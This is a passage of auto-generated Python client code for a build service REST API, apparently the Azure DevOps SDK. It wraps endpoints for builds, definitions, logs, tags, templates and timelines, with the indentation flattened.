"""DeleteBuild.
Deletes a build.
:param str project: Project ID or project name
:param int build_id: The ID of the build.
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
self._send(http_method='DELETE',
location_id='0cd358e1-9217-4d94-8269-1c1ee6f93dcf',
version='5.1',
route_values=route_values)
def get_build(self, project, build_id, property_filters=None):
"""GetBuild.
Gets a build
:param str project: Project ID or project name
:param int build_id:
:param str property_filters:
:rtype: :class:`<Build> <azure.devops.v5_1.build.models.Build>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
query_parameters = {}
if property_filters is not None:
query_parameters['propertyFilters'] = self._serialize.query('property_filters', property_filters, 'str')
response = self._send(http_method='GET',
location_id='0cd358e1-9217-4d94-8269-1c1ee6f93dcf',
version='5.1',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('Build', response)
def get_builds(self, project, definitions=None, queues=None, build_number=None, min_time=None, max_time=None, requested_for=None, reason_filter=None, status_filter=None, result_filter=None, tag_filters=None, properties=None, top=None, continuation_token=None, max_builds_per_definition=None, deleted_filter=None, query_order=None, branch_name=None, build_ids=None, repository_id=None, repository_type=None):
"""GetBuilds.
Gets a list of builds.
:param str project: Project ID or project name
:param [int] definitions: A comma-delimited list of definition IDs. If specified, filters to builds for these definitions.
:param [int] queues: A comma-delimited list of queue IDs. If specified, filters to builds that ran against these queues.
:param str build_number: If specified, filters to builds that match this build number. Append * to do a prefix search.
:param datetime min_time: If specified, filters to builds that finished/started/queued after this date based on the queryOrder specified.
:param datetime max_time: If specified, filters to builds that finished/started/queued before this date based on the queryOrder specified.
:param str requested_for: If specified, filters to builds requested for the specified user.
:param str reason_filter: If specified, filters to builds that match this reason.
:param str status_filter: If specified, filters to builds that match this status.
:param str result_filter: If specified, filters to builds that match this result.
:param [str] tag_filters: A comma-delimited list of tags. If specified, filters to builds that have the specified tags.
:param [str] properties: A comma-delimited list of properties to retrieve.
:param int top: The maximum number of builds to return.
:param str continuation_token: A continuation token, returned by a previous call to this method, that can be used to return the next set of builds.
:param int max_builds_per_definition: The maximum number of builds to return per definition.
:param str deleted_filter: Indicates whether to exclude, include, or only return deleted builds.
:param str query_order: The order in which builds should be returned.
:param str branch_name: If specified, filters to builds that built branches that built this branch.
:param [int] build_ids: A comma-delimited list that specifies the IDs of builds to retrieve.
:param str repository_id: If specified, filters to builds that built from this repository.
:param str repository_type: If specified, filters to builds that built from repositories of this type.
:rtype: :class:`<GetBuildsResponseValue>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if definitions is not None:
definitions = ",".join(map(str, definitions))
query_parameters['definitions'] = self._serialize.query('definitions', definitions, 'str')
if queues is not None:
queues = ",".join(map(str, queues))
query_parameters['queues'] = self._serialize.query('queues', queues, 'str')
if build_number is not None:
query_parameters['buildNumber'] = self._serialize.query('build_number', build_number, 'str')
if min_time is not None:
query_parameters['minTime'] = self._serialize.query('min_time', min_time, 'iso-8601')
if max_time is not None:
query_parameters['maxTime'] = self._serialize.query('max_time', max_time, 'iso-8601')
if requested_for is not None:
query_parameters['requestedFor'] = self._serialize.query('requested_for', requested_for, 'str')
if reason_filter is not None:
query_parameters['reasonFilter'] = self._serialize.query('reason_filter', reason_filter, 'str')
if status_filter is not None:
query_parameters['statusFilter'] = self._serialize.query('status_filter', status_filter, 'str')
if result_filter is not None:
query_parameters['resultFilter'] = self._serialize.query('result_filter', result_filter, 'str')
if tag_filters is not None:
tag_filters = ",".join(tag_filters)
query_parameters['tagFilters'] = self._serialize.query('tag_filters', tag_filters, 'str')
if properties is not None:
properties = ",".join(properties)
query_parameters['properties'] = self._serialize.query('properties', properties, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if continuation_token is not None:
query_parameters['continuationToken'] = self._serialize.query('continuation_token', continuation_token, 'str')
if max_builds_per_definition is not None:
query_parameters['maxBuildsPerDefinition'] = self._serialize.query('max_builds_per_definition', max_builds_per_definition, 'int')
if deleted_filter is not None:
query_parameters['deletedFilter'] = self._serialize.query('deleted_filter', deleted_filter, 'str')
if query_order is not None:
query_parameters['queryOrder'] = self._serialize.query('query_order', query_order, 'str')
if branch_name is not None:
query_parameters['branchName'] = self._serialize.query('branch_name', branch_name, 'str')
if build_ids is not None:
build_ids = ",".join(map(str, build_ids))
query_parameters['buildIds'] = self._serialize.query('build_ids', build_ids, 'str')
if repository_id is not None:
query_parameters['repositoryId'] = self._serialize.query('repository_id', repository_id, 'str')
if repository_type is not None:
query_parameters['repositoryType'] = self._serialize.query('repository_type', repository_type, 'str')
response = self._send(http_method='GET',
location_id='0cd358e1-9217-4d94-8269-1c1ee6f93dcf',
version='5.1',
route_values=route_values,
query_parameters=query_parameters)
response_value = self._deserialize('[Build]', self._unwrap_collection(response))
continuation_token = self._get_continuation_token(response)
return self.GetBuildsResponseValue(response_value, continuation_token)
class GetBuildsResponseValue(object):
def __init__(self, value, continuation_token):
"""
Response for the get_builds method
:param value:
:type value: :class:`<[Build]> <azure.devops.v5_1.build.models.[Build]>`
:param continuation_token: The continuation token to be used to get the next page of results.
:type continuation_token: str
"""
self.value = value
self.continuation_token = continuation_token
def queue_build(self, build, project, ignore_warnings=None, check_in_ticket=None, source_build_id=None):
"""QueueBuild.
Queues a build
:param :class:`<Build> <azure.devops.v5_1.build.models.Build>` build:
:param str project: Project ID or project name
:param bool ignore_warnings:
:param str check_in_ticket:
:param int source_build_id:
:rtype: :class:`<Build> <azure.devops.v5_1.build.models.Build>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if ignore_warnings is not None:
query_parameters['ignoreWarnings'] = self._serialize.query('ignore_warnings', ignore_warnings, 'bool')
if check_in_ticket is not None:
query_parameters['checkInTicket'] = self._serialize.query('check_in_ticket', check_in_ticket, 'str')
if source_build_id is not None:
query_parameters['sourceBuildId'] = self._serialize.query('source_build_id', source_build_id, 'int')
content = self._serialize.body(build, 'Build')
response = self._send(http_method='POST',
location_id='0cd358e1-9217-4d94-8269-1c1ee6f93dcf',
version='5.1',
route_values=route_values,
query_parameters=query_parameters,
content=content)
return self._deserialize('Build', response)
def update_build(self, build, project, build_id, retry=None):
"""UpdateBuild.
Updates a build.
:param :class:`<Build> <azure.devops.v5_1.build.models.Build>` build: The build.
:param str project: Project ID or project name
:param int build_id: The ID of the build.
:param bool retry:
:rtype: :class:`<Build> <azure.devops.v5_1.build.models.Build>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
query_parameters = {}
if retry is not None:
query_parameters['retry'] = self._serialize.query('retry', retry, 'bool')
content = self._serialize.body(build, 'Build')
response = self._send(http_method='PATCH',
location_id='0cd358e1-9217-4d94-8269-1c1ee6f93dcf',
version='5.1',
route_values=route_values,
query_parameters=query_parameters,
content=content)
return self._deserialize('Build', response)
def update_builds(self, builds, project):
"""UpdateBuilds.
Updates multiple builds.
:param [Build] builds: The builds to update.
:param str project: Project ID or project name
:rtype: [Build]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
content = self._serialize.body(builds, '[Build]')
response = self._send(http_method='PATCH',
location_id='0cd358e1-9217-4d94-8269-1c1ee6f93dcf',
version='5.1',
route_values=route_values,
content=content)
return self._deserialize('[Build]', self._unwrap_collection(response))
def get_build_changes(self, project, build_id, continuation_token=None, top=None, include_source_change=None):
"""GetBuildChanges.
Gets the changes associated with a build
:param str project: Project ID or project name
:param int build_id:
:param str continuation_token:
:param int top: The maximum number of changes to return
:param bool include_source_change:
:rtype: :class:`<GetBuildChangesResponseValue>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
query_parameters = {}
if continuation_token is not None:
query_parameters['continuationToken'] = self._serialize.query('continuation_token', continuation_token, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if include_source_change is not None:
query_parameters['includeSourceChange'] = self._serialize.query('include_source_change', include_source_change, 'bool')
response = self._send(http_method='GET',
location_id='54572c7b-bbd3-45d4-80dc-28be08941620',
version='5.1',
route_values=route_values,
query_parameters=query_parameters)
response_value = self._deserialize('[Change]', self._unwrap_collection(response))
continuation_token = self._get_continuation_token(response)
return self.GetBuildChangesResponseValue(response_value, continuation_token)
class GetBuildChangesResponseValue(object):
def __init__(self, value, continuation_token):
"""
Response for the get_build_changes method
:param value:
:type value: :class:`<[Change]> <azure.devops.v5_1.build.models.[Change]>`
:param continuation_token: The continuation token to be used to get the next page of results.
:type continuation_token: str
"""
self.value = value
self.continuation_token = continuation_token
def get_build_controller(self, controller_id):
"""GetBuildController.
Gets a controller
:param int controller_id:
:rtype: :class:`<BuildController> <azure.devops.v5_1.build.models.BuildController>`
"""
route_values = {}
if controller_id is not None:
route_values['controllerId'] = self._serialize.url('controller_id', controller_id, 'int')
response = self._send(http_method='GET',
location_id='fcac1932-2ee1-437f-9b6f-7f696be858f6',
version='5.1',
route_values=route_values)
return self._deserialize('BuildController', response)
def get_build_controllers(self, name=None):
"""GetBuildControllers.
Gets controller, optionally filtered by name
:param str name:
:rtype: [BuildController]
"""
query_parameters = {}
if name is not None:
query_parameters['name'] = self._serialize.query('name', name, 'str')
response = self._send(http_method='GET',
location_id='fcac1932-2ee1-437f-9b6f-7f696be858f6',
version='5.1',
query_parameters=query_parameters)
return self._deserialize('[BuildController]', self._unwrap_collection(response))
def create_definition(self, definition, project, definition_to_clone_id=None, definition_to_clone_revision=None):
"""CreateDefinition.
Creates a new definition.
:param :class:`<BuildDefinition> <azure.devops.v5_1.build.models.BuildDefinition>` definition: The definition.
:param str project: Project ID or project name
:param int definition_to_clone_id:
:param int definition_to_clone_revision:
:rtype: :class:`<BuildDefinition> <azure.devops.v5_1.build.models.BuildDefinition>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if definition_to_clone_id is not None:
query_parameters['definitionToCloneId'] = self._serialize.query('definition_to_clone_id', definition_to_clone_id, 'int')
if definition_to_clone_revision is not None:
query_parameters['definitionToCloneRevision'] = self._serialize.query('definition_to_clone_revision', definition_to_clone_revision, 'int')
content = self._serialize.body(definition, 'BuildDefinition')
response = self._send(http_method='POST',
location_id='dbeaf647-6167-421a-bda9-c9327b25e2e6',
version='5.1',
route_values=route_values,
query_parameters=query_parameters,
content=content)
return self._deserialize('BuildDefinition', response)
def delete_definition(self, project, definition_id):
"""DeleteDefinition.
Deletes a definition and all associated builds.
:param str project: Project ID or project name
:param int definition_id: The ID of the definition.
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if definition_id is not None:
route_values['definitionId'] = self._serialize.url('definition_id', definition_id, 'int')
self._send(http_method='DELETE',
location_id='dbeaf647-6167-421a-bda9-c9327b25e2e6',
version='5.1',
route_values=route_values)
def get_definition(self, project, definition_id, revision=None, min_metrics_time=None, property_filters=None, include_latest_builds=None):
"""GetDefinition.
Gets a definition, optionally at a specific revision.
:param str project: Project ID or project name
:param int definition_id: The ID of the definition.
:param int revision: The revision number to retrieve. If this is not specified, the latest version will be returned.
:param datetime min_metrics_time: If specified, indicates the date from which metrics should be included.
:param [str] property_filters: A comma-delimited list of properties to include in the results.
:param bool include_latest_builds:
:rtype: :class:`<BuildDefinition> <azure.devops.v5_1.build.models.BuildDefinition>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if definition_id is not None:
route_values['definitionId'] = self._serialize.url('definition_id', definition_id, 'int')
query_parameters = {}
if revision is not None:
query_parameters['revision'] = self._serialize.query('revision', revision, 'int')
if min_metrics_time is not None:
query_parameters['minMetricsTime'] = self._serialize.query('min_metrics_time', min_metrics_time, 'iso-8601')
if property_filters is not None:
property_filters = ",".join(property_filters)
query_parameters['propertyFilters'] = self._serialize.query('property_filters', property_filters, 'str')
if include_latest_builds is not None:
query_parameters['includeLatestBuilds'] = self._serialize.query('include_latest_builds', include_latest_builds, 'bool')
response = self._send(http_method='GET',
location_id='dbeaf647-6167-421a-bda9-c9327b25e2e6',
version='5.1',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('BuildDefinition', response)
def get_definitions(self, project, name=None, repository_id=None, repository_type=None, query_order=None, top=None, continuation_token=None, min_metrics_time=None, definition_ids=None, path=None, built_after=None, not_built_after=None, include_all_properties=None, include_latest_builds=None, task_id_filter=None, process_type=None, yaml_filename=None):
"""GetDefinitions.
Gets a list of definitions.
:param str project: Project ID or project name
:param str name: If specified, filters to definitions whose names match this pattern.
:param str repository_id: A repository ID. If specified, filters to definitions that use this repository.
:param str repository_type: If specified, filters to definitions that have a repository of this type.
:param str query_order: Indicates the order in which definitions should be returned.
:param int top: The maximum number of definitions to return.
:param str continuation_token: A continuation token, returned by a previous call to this method, that can be used to return the next set of definitions.
:param datetime min_metrics_time: If specified, indicates the date from which metrics should be included.
:param [int] definition_ids: A comma-delimited list that specifies the IDs of definitions to retrieve.
:param str path: If specified, filters to definitions under this folder.
:param datetime built_after: If specified, filters to definitions that have builds after this date.
:param datetime not_built_after: If specified, filters to definitions that do not have builds after this date.
:param bool include_all_properties: Indicates whether the full definitions should be returned. By default, shallow representations of the definitions are returned.
:param bool include_latest_builds: Indicates whether to return the latest and latest completed builds for this definition.
:param str task_id_filter: If specified, filters to definitions that use the specified task.
:param int process_type: If specified, filters to definitions with the given process type.
:param str yaml_filename: If specified, filters to YAML definitions that match the given filename.
:rtype: :class:`<GetDefinitionsResponseValue>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if name is not None:
query_parameters['name'] = self._serialize.query('name', name, 'str')
if repository_id is not None:
query_parameters['repositoryId'] = self._serialize.query('repository_id', repository_id, 'str')
if repository_type is not None:
query_parameters['repositoryType'] = self._serialize.query('repository_type', repository_type, 'str')
if query_order is not None:
query_parameters['queryOrder'] = self._serialize.query('query_order', query_order, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if continuation_token is not None:
query_parameters['continuationToken'] = self._serialize.query('continuation_token', continuation_token, 'str')
if min_metrics_time is not None:
query_parameters['minMetricsTime'] = self._serialize.query('min_metrics_time', min_metrics_time, 'iso-8601')
if definition_ids is not None:
definition_ids = ",".join(map(str, definition_ids))
query_parameters['definitionIds'] = self._serialize.query('definition_ids', definition_ids, 'str')
if path is not None:
query_parameters['path'] = self._serialize.query('path', path, 'str')
if built_after is not None:
query_parameters['builtAfter'] = self._serialize.query('built_after', built_after, 'iso-8601')
if not_built_after is not None:
query_parameters['notBuiltAfter'] = self._serialize.query('not_built_after', not_built_after, 'iso-8601')
if include_all_properties is not None:
query_parameters['includeAllProperties'] = self._serialize.query('include_all_properties', include_all_properties, 'bool')
if include_latest_builds is not None:
query_parameters['includeLatestBuilds'] = self._serialize.query('include_latest_builds', include_latest_builds, 'bool')
if task_id_filter is not None:
query_parameters['taskIdFilter'] = self._serialize.query('task_id_filter', task_id_filter, 'str')
if process_type is not None:
query_parameters['processType'] = self._serialize.query('process_type', process_type, 'int')
if yaml_filename is not None:
query_parameters['yamlFilename'] = self._serialize.query('yaml_filename', yaml_filename, 'str')
response = self._send(http_method='GET',
location_id='dbeaf647-6167-421a-bda9-c9327b25e2e6',
version='5.1',
route_values=route_values,
query_parameters=query_parameters)
response_value = self._deserialize('[BuildDefinitionReference]', self._unwrap_collection(response))
continuation_token = self._get_continuation_token(response)
return self.GetDefinitionsResponseValue(response_value, continuation_token)
class GetDefinitionsResponseValue(object):
def __init__(self, value, continuation_token):
"""
Response for the get_definitions method
:param value:
:type value: :class:`<[BuildDefinitionReference]> <azure.devops.v5_1.build.models.[BuildDefinitionReference]>`
:param continuation_token: The continuation token to be used to get the next page of results.
:type continuation_token: str
"""
self.value = value
self.continuation_token = continuation_token
def restore_definition(self, project, definition_id, deleted):
"""RestoreDefinition.
Restores a deleted definition
:param str project: Project ID or project name
:param int definition_id: The identifier of the definition to restore.
:param bool deleted: When false, restores a deleted definition.
:rtype: :class:`<BuildDefinition> <azure.devops.v5_1.build.models.BuildDefinition>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if definition_id is not None:
route_values['definitionId'] = self._serialize.url('definition_id', definition_id, 'int')
query_parameters = {}
if deleted is not None:
query_parameters['deleted'] = self._serialize.query('deleted', deleted, 'bool')
response = self._send(http_method='PATCH',
location_id='dbeaf647-6167-421a-bda9-c9327b25e2e6',
version='5.1',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('BuildDefinition', response)
def update_definition(self, definition, project, definition_id, secrets_source_definition_id=None, secrets_source_definition_revision=None):
"""UpdateDefinition.
Updates an existing definition.
:param :class:`<BuildDefinition> <azure.devops.v5_1.build.models.BuildDefinition>` definition: The new version of the definition.
:param str project: Project ID or project name
:param int definition_id: The ID of the definition.
:param int secrets_source_definition_id:
:param int secrets_source_definition_revision:
:rtype: :class:`<BuildDefinition> <azure.devops.v5_1.build.models.BuildDefinition>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if definition_id is not None:
route_values['definitionId'] = self._serialize.url('definition_id', definition_id, 'int')
query_parameters = {}
if secrets_source_definition_id is not None:
query_parameters['secretsSourceDefinitionId'] = self._serialize.query('secrets_source_definition_id', secrets_source_definition_id, 'int')
if secrets_source_definition_revision is not None:
query_parameters['secretsSourceDefinitionRevision'] = self._serialize.query('secrets_source_definition_revision', secrets_source_definition_revision, 'int')
content = self._serialize.body(definition, 'BuildDefinition')
response = self._send(http_method='PUT',
location_id='dbeaf647-6167-421a-bda9-c9327b25e2e6',
version='5.1',
route_values=route_values,
query_parameters=query_parameters,
content=content)
return self._deserialize('BuildDefinition', response)
def get_build_log(self, project, build_id, log_id, start_line=None, end_line=None, **kwargs):
"""GetBuildLog.
Gets an individual log file for a build.
:param str project: Project ID or project name
:param int build_id: The ID of the build.
:param int log_id: The ID of the log file.
:param long start_line: The start line.
:param long end_line: The end line.
:rtype: object
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
if log_id is not None:
route_values['logId'] = self._serialize.url('log_id', log_id, 'int')
query_parameters = {}
if start_line is not None:
query_parameters['startLine'] = self._serialize.query('start_line', start_line, 'long')
if end_line is not None:
query_parameters['endLine'] = self._serialize.query('end_line', end_line, 'long')
response = self._send(http_method='GET',
location_id='35a80daf-7f30-45fc-86e8-6b813d9c90df',
version='5.1',
route_values=route_values,
query_parameters=query_parameters,
accept_media_type='text/plain')
if "callback" in kwargs:
callback = kwargs["callback"]
else:
callback = None
return self._client.stream_download(response, callback=callback)
def get_build_log_lines(self, project, build_id, log_id, start_line=None, end_line=None):
"""GetBuildLogLines.
Gets an individual log file for a build.
:param str project: Project ID or project name
:param int build_id: The ID of the build.
:param int log_id: The ID of the log file.
:param long start_line: The start line.
:param long end_line: The end line.
:rtype: [str]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
if log_id is not None:
route_values['logId'] = self._serialize.url('log_id', log_id, 'int')
query_parameters = {}
if start_line is not None:
query_parameters['startLine'] = self._serialize.query('start_line', start_line, 'long')
if end_line is not None:
query_parameters['endLine'] = self._serialize.query('end_line', end_line, 'long')
response = self._send(http_method='GET',
location_id='35a80daf-7f30-45fc-86e8-6b813d9c90df',
version='5.1',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[str]', self._unwrap_collection(response))
def get_build_logs(self, project, build_id):
"""GetBuildLogs.
Gets the logs for a build.
:param str project: Project ID or project name
:param int build_id: The ID of the build.
:rtype: [BuildLog]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
response = self._send(http_method='GET',
location_id='35a80daf-7f30-45fc-86e8-6b813d9c90df',
version='5.1',
route_values=route_values)
return self._deserialize('[BuildLog]', self._unwrap_collection(response))
def get_build_logs_zip(self, project, build_id, **kwargs):
"""GetBuildLogsZip.
Gets the logs for a build.
:param str project: Project ID or project name
:param int build_id: The ID of the build.
:rtype: object
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
response = self._send(http_method='GET',
location_id='35a80daf-7f30-45fc-86e8-6b813d9c90df',
version='5.1',
route_values=route_values,
accept_media_type='application/zip')
if "callback" in kwargs:
callback = kwargs["callback"]
else:
callback = None
return self._client.stream_download(response, callback=callback)
def get_build_log_zip(self, project, build_id, log_id, start_line=None, end_line=None, **kwargs):
"""GetBuildLogZip.
Gets an individual log file for a build.
:param str project: Project ID or project name
:param int build_id: The ID of the build.
:param int log_id: The ID of the log file.
:param long start_line: The start line.
:param long end_line: The end line.
:rtype: object
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
if log_id is not None:
route_values['logId'] = self._serialize.url('log_id', log_id, 'int')
query_parameters = {}
if start_line is not None:
query_parameters['startLine'] = self._serialize.query('start_line', start_line, 'long')
if end_line is not None:
query_parameters['endLine'] = self._serialize.query('end_line', end_line, 'long')
response = self._send(http_method='GET',
location_id='35a80daf-7f30-45fc-86e8-6b813d9c90df',
version='5.1',
route_values=route_values,
query_parameters=query_parameters,
accept_media_type='application/zip')
if "callback" in kwargs:
callback = kwargs["callback"]
else:
callback = None
return self._client.stream_download(response, callback=callback)
def get_build_option_definitions(self, project=None):
"""GetBuildOptionDefinitions.
Gets all build definition options supported by the system.
:param str project: Project ID or project name
:rtype: [BuildOptionDefinition]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
response = self._send(http_method='GET',
location_id='591cb5a4-2d46-4f3a-a697-5cd42b6bd332',
version='5.1',
route_values=route_values)
return self._deserialize('[BuildOptionDefinition]', self._unwrap_collection(response))
def get_definition_revisions(self, project, definition_id):
"""GetDefinitionRevisions.
Gets all revisions of a definition.
:param str project: Project ID or project name
:param int definition_id: The ID of the definition.
:rtype: [BuildDefinitionRevision]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if definition_id is not None:
route_values['definitionId'] = self._serialize.url('definition_id', definition_id, 'int')
response = self._send(http_method='GET',
location_id='7c116775-52e5-453e-8c5d-914d9762d8c4',
version='5.1',
route_values=route_values)
return self._deserialize('[BuildDefinitionRevision]', self._unwrap_collection(response))
def get_build_settings(self, project=None):
"""GetBuildSettings.
Gets the build settings.
:param str project: Project ID or project name
:rtype: :class:`<BuildSettings> <azure.devops.v5_1.build.models.BuildSettings>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
response = self._send(http_method='GET',
location_id='aa8c1c9c-ef8b-474a-b8c4-785c7b191d0d',
version='5.1',
route_values=route_values)
return self._deserialize('BuildSettings', response)
def update_build_settings(self, settings, project=None):
"""UpdateBuildSettings.
Updates the build settings.
:param :class:`<BuildSettings> <azure.devops.v5_1.build.models.BuildSettings>` settings: The new settings.
:param str project: Project ID or project name
:rtype: :class:`<BuildSettings> <azure.devops.v5_1.build.models.BuildSettings>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
content = self._serialize.body(settings, 'BuildSettings')
response = self._send(http_method='PATCH',
location_id='aa8c1c9c-ef8b-474a-b8c4-785c7b191d0d',
version='5.1',
route_values=route_values,
content=content)
return self._deserialize('BuildSettings', response)
def add_build_tag(self, project, build_id, tag):
"""AddBuildTag.
Adds a tag to a build.
:param str project: Project ID or project name
:param int build_id: The ID of the build.
:param str tag: The tag to add.
:rtype: [str]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
if tag is not None:
route_values['tag'] = self._serialize.url('tag', tag, 'str')
response = self._send(http_method='PUT',
location_id='6e6114b2-8161-44c8-8f6c-c5505782427f',
version='5.1',
route_values=route_values)
return self._deserialize('[str]', self._unwrap_collection(response))
def add_build_tags(self, tags, project, build_id):
"""AddBuildTags.
Adds tags to a build.
:param [str] tags: The tags to add.
:param str project: Project ID or project name
:param int build_id: The ID of the build.
:rtype: [str]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
content = self._serialize.body(tags, '[str]')
response = self._send(http_method='POST',
location_id='6e6114b2-8161-44c8-8f6c-c5505782427f',
version='5.1',
route_values=route_values,
content=content)
return self._deserialize('[str]', self._unwrap_collection(response))
def delete_build_tag(self, project, build_id, tag):
"""DeleteBuildTag.
Removes a tag from a build.
:param str project: Project ID or project name
:param int build_id: The ID of the build.
:param str tag: The tag to remove.
:rtype: [str]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
if tag is not None:
route_values['tag'] = self._serialize.url('tag', tag, 'str')
response = self._send(http_method='DELETE',
location_id='6e6114b2-8161-44c8-8f6c-c5505782427f',
version='5.1',
route_values=route_values)
return self._deserialize('[str]', self._unwrap_collection(response))
def get_build_tags(self, project, build_id):
"""GetBuildTags.
Gets the tags for a build.
:param str project: Project ID or project name
:param int build_id: The ID of the build.
:rtype: [str]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
response = self._send(http_method='GET',
location_id='6e6114b2-8161-44c8-8f6c-c5505782427f',
version='5.1',
route_values=route_values)
return self._deserialize('[str]', self._unwrap_collection(response))
def get_tags(self, project):
"""GetTags.
Gets a list of all build and definition tags in the project.
:param str project: Project ID or project name
:rtype: [str]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
response = self._send(http_method='GET',
location_id='d84ac5c6-edc7-43d5-adc9-1b34be5dea09',
version='5.1',
route_values=route_values)
return self._deserialize('[str]', self._unwrap_collection(response))
def delete_template(self, project, template_id):
"""DeleteTemplate.
Deletes a build definition template.
:param str project: Project ID or project name
:param str template_id: The ID of the template.
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if template_id is not None:
route_values['templateId'] = self._serialize.url('template_id', template_id, 'str')
self._send(http_method='DELETE',
location_id='e884571e-7f92-4d6a-9274-3f5649900835',
version='5.1',
route_values=route_values)
def get_template(self, project, template_id):
"""GetTemplate.
Gets a specific build definition template.
:param str project: Project ID or project name
:param str template_id: The ID of the requested template.
:rtype: :class:`<BuildDefinitionTemplate> <azure.devops.v5_1.build.models.BuildDefinitionTemplate>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if template_id is not None:
route_values['templateId'] = self._serialize.url('template_id', template_id, 'str')
response = self._send(http_method='GET',
location_id='e884571e-7f92-4d6a-9274-3f5649900835',
version='5.1',
route_values=route_values)
return self._deserialize('BuildDefinitionTemplate', response)
def get_templates(self, project):
"""GetTemplates.
Gets all definition templates.
:param str project: Project ID or project name
:rtype: [BuildDefinitionTemplate]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
response = self._send(http_method='GET',
location_id='e884571e-7f92-4d6a-9274-3f5649900835',
version='5.1',
route_values=route_values)
return self._deserialize('[BuildDefinitionTemplate]', self._unwrap_collection(response))
def save_template(self, template, project, template_id):
"""SaveTemplate.
Updates an existing build definition template.
:param :class:`<BuildDefinitionTemplate> <azure.devops.v5_1.build.models.BuildDefinitionTemplate>` template: The new version of the template.
:param str project: Project ID or project name
:param str template_id: The ID of the template.
:rtype: :class:`<BuildDefinitionTemplate> <azure.devops.v5_1.build.models.BuildDefinitionTemplate>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if template_id is not None:
route_values['templateId'] = self._serialize.url('template_id', template_id, 'str')
content = self._serialize.body(template, 'BuildDefinitionTemplate')
response = self._send(http_method='PUT',
location_id='e884571e-7f92-4d6a-9274-3f5649900835',
version='5.1',
route_values=route_values,
content=content)
return self._deserialize('BuildDefinitionTemplate', response)
def get_build_timeline(self, project, build_id, timeline_id=None, change_id=None, plan_id=None):
"""GetBuildTimeline.
Gets details for a build
:param str project: Project ID or project name
:param int build_id:
:param str timeline_id:
:param int change_id:
:param str plan_id:
:rtype: :class:`<Timeline> <azure.devops.v5_1.build.models.Timeline>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if build_id is not None:
route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
if timeline_id is not None:
route_values['timelineId'] = self._serialize.url('timeline_id', timeline_id, 'str')
query_parameters = {}
if change_id is not None:
query_parameters['changeId'] = self._serialize.query('change_id', change_id, 'int')
if plan_id is not None:
query_parameters['planId'] = self._serialize.query('plan_id', plan_id, 'str')
response = self._send(http_method='GET',
location_id='8baac422-4c6e-4de5-8532-db96d92acffa',
version='5.1',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('Timeline', response)
